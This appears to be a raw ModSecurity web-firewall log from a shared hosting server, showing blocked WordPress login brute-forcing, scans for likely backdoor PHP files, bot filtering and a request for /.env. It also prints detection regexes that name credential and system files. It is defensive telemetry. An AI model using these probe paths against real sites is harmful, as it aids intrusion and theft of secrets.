[Tue May 26 19:06:20.981949 2026] [security2:error] [pid 6038:tid 6171] [client 14.182.127.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh1FHA3ZmGrHHEr4qdCAAAAIg"]
[Tue May 26 19:06:21.816469 2026] [security2:error] [pid 6038:tid 6144] [remote 132.148.72.88:57620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWh1VHA3ZmGrHHEr4qdJQAA32k"]
[Tue May 26 19:06:22.998408 2026] [security2:error] [pid 6038:tid 6212] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh1lHA3ZmGrHHEr4qdQwAAALE"]
[Tue May 26 19:06:23.475889 2026] [security2:error] [pid 6038:tid 6043] [remote 103.95.119.103:56098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWh11HA3ZmGrHHEr4qdWQAAmwQ"]
[Tue May 26 19:06:23.645462 2026] [security2:error] [pid 6038:tid 6041] [remote 50.6.192.190:34226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWh11HA3ZmGrHHEr4qdWgAA_QI"]
[Tue May 26 19:06:23.855770 2026] [security2:error] [pid 6038:tid 6185] [client 20.12.190.196:41999] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWh11HA3ZmGrHHEr4qdaAAAAJY"]
[Tue May 26 19:06:23.855930 2026] [security2:error] [pid 6038:tid 6185] [client 20.12.190.196:41999] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWh11HA3ZmGrHHEr4qdaAAAAJY"]
[Tue May 26 19:06:24.223929 2026] [security2:error] [pid 6038:tid 6047] [remote 50.6.192.190:34226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWh2FHA3ZmGrHHEr4qdbwAA7wg"], referer: https://preetishah.com/wp-login.php
[Tue May 26 19:06:24.793191 2026] [security2:error] [pid 6038:tid 6236] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh2FHA3ZmGrHHEr4qdeAAAAMk"]
[Tue May 26 19:06:24.829190 2026] [security2:error] [pid 6038:tid 6176] [client 20.12.190.196:35440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahWh2FHA3ZmGrHHEr4qdhgAAAI0"]
[Tue May 26 19:06:24.829334 2026] [security2:error] [pid 6038:tid 6176] [client 20.12.190.196:35440] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahWh2FHA3ZmGrHHEr4qdhgAAAI0"]
[Tue May 26 19:06:24.894787 2026] [security2:error] [pid 6038:tid 6053] [remote 103.95.119.103:56098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWh2FHA3ZmGrHHEr4qdiAAAww4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:06:25.740594 2026] [security2:error] [pid 6038:tid 6057] [remote 132.148.72.88:57620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWh2VHA3ZmGrHHEr4qdlAAA1hI"], referer: https://poonawallatennisacademy.moes-art.com/wp-login.php
[Tue May 26 19:06:26.530259 2026] [security2:error] [pid 6038:tid 6265] [client 20.12.190.196:41567] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "com.md-74.webhostbox.net"] [uri "/sx_pms.php"] [unique_id "ahWh2lHA3ZmGrHHEr4qdpwAAAOY"]
[Tue May 26 19:06:26.530428 2026] [security2:error] [pid 6038:tid 6265] [client 20.12.190.196:41567] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "com.md-74.webhostbox.net"] [uri "/sx_pms.php"] [unique_id "ahWh2lHA3ZmGrHHEr4qdpwAAAOY"]
[Tue May 26 19:06:27.062566 2026] [security2:error] [pid 6038:tid 6290] [client 20.12.190.196:35410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "com.md-74.webhostbox.net"] [uri "/wp-info.php"] [unique_id "ahWh21HA3ZmGrHHEr4qdtwAAAP8"]
[Tue May 26 19:06:27.062709 2026] [security2:error] [pid 6038:tid 6290] [client 20.12.190.196:35410] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "com.md-74.webhostbox.net"] [uri "/wp-info.php"] [unique_id "ahWh21HA3ZmGrHHEr4qdtwAAAP8"]
[Tue May 26 19:06:27.401705 2026] [security2:error] [pid 6038:tid 6170] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh2lHA3ZmGrHHEr4qdtQAAAIc"]
[Tue May 26 19:06:27.557365 2026] [security2:error] [pid 6038:tid 6212] [client 20.12.190.196:39960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "com.md-74.webhostbox.net"] [uri "/wp-test.php"] [unique_id "ahWh21HA3ZmGrHHEr4qdyQAAALE"]
[Tue May 26 19:06:27.557484 2026] [security2:error] [pid 6038:tid 6212] [client 20.12.190.196:39960] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "com.md-74.webhostbox.net"] [uri "/wp-test.php"] [unique_id "ahWh21HA3ZmGrHHEr4qdyQAAALE"]
[Tue May 26 19:06:27.917028 2026] [security2:error] [pid 6038:tid 6249] [client 20.12.190.196:41563] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahWh21HA3ZmGrHHEr4qd1AAAANY"]
[Tue May 26 19:06:27.917160 2026] [security2:error] [pid 6038:tid 6249] [client 20.12.190.196:41563] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahWh21HA3ZmGrHHEr4qd1AAAANY"]
[Tue May 26 19:06:28.014958 2026] [security2:error] [pid 6038:tid 6190] [client 185.191.171.17:20812] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/5/"] [unique_id "ahWh3FHA3ZmGrHHEr4qd1QAAAJs"]
[Tue May 26 19:06:28.015075 2026] [security2:error] [pid 6038:tid 6190] [client 185.191.171.17:20812] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/5/"] [unique_id "ahWh3FHA3ZmGrHHEr4qd1QAAAJs"]
[Tue May 26 19:06:29.458022 2026] [security2:error] [pid 6038:tid 6185] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh3VHA3ZmGrHHEr4qd9wAAAJY"]
[Tue May 26 19:06:31.306268 2026] [security2:error] [pid 6038:tid 6286] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh3lHA3ZmGrHHEr4qeMwAAAPs"]
[Tue May 26 19:06:32.839738 2026] [security2:error] [pid 6038:tid 6191] [client 20.12.190.196:41561] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "com.md-74.webhostbox.net"] [uri "/we.php"] [unique_id "ahWh4FHA3ZmGrHHEr4qeWwAAAJw"]
[Tue May 26 19:06:32.839869 2026] [security2:error] [pid 6038:tid 6191] [client 20.12.190.196:41561] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "com.md-74.webhostbox.net"] [uri "/we.php"] [unique_id "ahWh4FHA3ZmGrHHEr4qeWwAAAJw"]
[Tue May 26 19:06:33.354860 2026] [security2:error] [pid 6038:tid 6187] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh4FHA3ZmGrHHEr4qeXgAAAJg"]
[Tue May 26 19:06:35.835140 2026] [security2:error] [pid 6038:tid 6259] [client 20.12.190.196:35422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahWh41HA3ZmGrHHEr4qesAAAAOA"]
[Tue May 26 19:06:35.835245 2026] [security2:error] [pid 6038:tid 6259] [client 20.12.190.196:35422] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahWh41HA3ZmGrHHEr4qesAAAAOA"]
[Tue May 26 19:06:36.020991 2026] [security2:error] [pid 6038:tid 6271] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh41HA3ZmGrHHEr4qeqgAAAOw"]
[Tue May 26 19:06:37.467010 2026] [security2:error] [pid 6038:tid 6238] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh5VHA3ZmGrHHEr4qe1QAAAMs"]
[Tue May 26 19:06:38.275610 2026] [security2:error] [pid 6038:tid 6111] [remote 95.217.78.234:40046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.78.217.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWh5lHA3ZmGrHHEr4qe9QAA6kg"]
[Tue May 26 19:06:38.487943 2026] [security2:error] [pid 6038:tid 6099] [remote 95.217.78.234:40046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.78.217.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWh5lHA3ZmGrHHEr4qfBAAAlzw"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:06:40.030872 2026] [security2:error] [pid 6038:tid 6295] [client 102.164.188.174:19628] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/salaries/payment_salary/card.php"] [unique_id "ahWh51HA3ZmGrHHEr4qfMQABBEE"], referer: https://erp.azurmediatec.com/salaries/payment_salary/card.php?id=28&action=delete&token=f37c35c9de3ddfad11d25aef7fc4c9c6
[Tue May 26 19:06:40.352631 2026] [security2:error] [pid 6038:tid 6292] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh51HA3ZmGrHHEr4qfLAAAAQE"]
[Tue May 26 19:06:42.012288 2026] [security2:error] [pid 6038:tid 6274] [client 176.65.139.234:44328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "sg.canopykaapi.com"] [uri "/.env"] [unique_id "ahWh6lHA3ZmGrHHEr4qfZwAAAO8"]
[Tue May 26 19:06:42.615559 2026] [security2:error] [pid 6038:tid 6256] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh6lHA3ZmGrHHEr4qfcQAAAN0"]
[Tue May 26 19:06:44.039180 2026] [security2:error] [pid 6038:tid 6190] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh61HA3ZmGrHHEr4qfywAAAJs"]
[Tue May 26 19:06:44.871977 2026] [security2:error] [pid 6038:tid 6220] [client 47.128.40.34:58958] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "pstta.in"] [uri "/robots.txt"] [unique_id "ahWh7FHA3ZmGrHHEr4qgDAAAALk"]
[Tue May 26 19:06:45.525430 2026] [security2:error] [pid 6038:tid 6248] [client 171.79.54.196:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh7VHA3ZmGrHHEr4qgGAAAANU"]
[Tue May 26 19:06:46.755894 2026] [security2:error] [pid 6038:tid 6172] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh7lHA3ZmGrHHEr4qgXAAAAIk"]
[Tue May 26 19:06:48.247425 2026] [security2:error] [pid 6038:tid 6274] [client 142.132.180.39:20256] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWh8FHA3ZmGrHHEr4qgiAAAAO8"], referer: https://thegoodsporting.com
[Tue May 26 19:06:48.470778 2026] [security2:error] [pid 6038:tid 6243] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh8FHA3ZmGrHHEr4qghAAAANA"]
[Tue May 26 19:06:51.422730 2026] [security2:error] [pid 6038:tid 6237] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh81HA3ZmGrHHEr4qg0QAAAMo"]
[Tue May 26 19:06:52.017250 2026] [security2:error] [pid 6038:tid 6172] [client 216.73.160.117:51681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 117.160.73.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shirdisaibabatemple.org"] [uri "/wp-login.php"] [unique_id "ahWh81HA3ZmGrHHEr4qg3QAAAIk"]
[Tue May 26 19:06:52.290237 2026] [security2:error] [pid 6038:tid 6257] [client 42.48.38.37:34017] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahWh8lHA3ZmGrHHEr4qgxwAAAN4"]
[Tue May 26 19:06:52.498346 2026] [security2:error] [pid 6038:tid 6206] [client 20.104.227.76:10354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWh9FHA3ZmGrHHEr4qhEAAAAKs"]
[Tue May 26 19:06:52.498497 2026] [security2:error] [pid 6038:tid 6206] [client 20.104.227.76:10354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWh9FHA3ZmGrHHEr4qhEAAAAKs"]
[Tue May 26 19:06:52.703667 2026] [security2:error] [pid 6038:tid 6208] [client 20.104.227.76:8333] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/core/init.php"] [unique_id "ahWh9FHA3ZmGrHHEr4qhGgAAAK0"]
[Tue May 26 19:06:52.703776 2026] [security2:error] [pid 6038:tid 6208] [client 20.104.227.76:8333] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/core/init.php"] [unique_id "ahWh9FHA3ZmGrHHEr4qhGgAAAK0"]
[Tue May 26 19:06:52.830094 2026] [security2:error] [pid 6038:tid 6179] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh9FHA3ZmGrHHEr4qhCQAAAJA"]
[Tue May 26 19:06:52.857945 2026] [security2:error] [pid 6038:tid 6277] [client 20.104.227.76:10318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/aa.php"] [unique_id "ahWh9FHA3ZmGrHHEr4qhKwAAAPI"]
[Tue May 26 19:06:52.858039 2026] [security2:error] [pid 6038:tid 6277] [client 20.104.227.76:10318] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/aa.php"] [unique_id "ahWh9FHA3ZmGrHHEr4qhKwAAAPI"]
[Tue May 26 19:06:53.021003 2026] [security2:error] [pid 6038:tid 6082] [remote 5.42.158.148:41894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWh9FHA3ZmGrHHEr4qhKgAA3Ss"]
[Tue May 26 19:06:53.097685 2026] [security2:error] [pid 6038:tid 6204] [client 20.104.227.76:10704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/xmrlpc.php"] [unique_id "ahWh9VHA3ZmGrHHEr4qhNgAAAKk"]
[Tue May 26 19:06:53.097802 2026] [security2:error] [pid 6038:tid 6204] [client 20.104.227.76:10704] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/xmrlpc.php"] [unique_id "ahWh9VHA3ZmGrHHEr4qhNgAAAKk"]
[Tue May 26 19:06:53.339498 2026] [security2:error] [pid 6038:tid 6257] [client 20.104.227.76:10320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/class.php"] [unique_id "ahWh9VHA3ZmGrHHEr4qhRwAAAN4"]
[Tue May 26 19:06:53.339595 2026] [security2:error] [pid 6038:tid 6257] [client 20.104.227.76:10320] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/class.php"] [unique_id "ahWh9VHA3ZmGrHHEr4qhRwAAAN4"]
[Tue May 26 19:06:53.498645 2026] [security2:error] [pid 6038:tid 6224] [client 20.104.227.76:10343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/goods.php"] [unique_id "ahWh9VHA3ZmGrHHEr4qhTwAAAL0"]
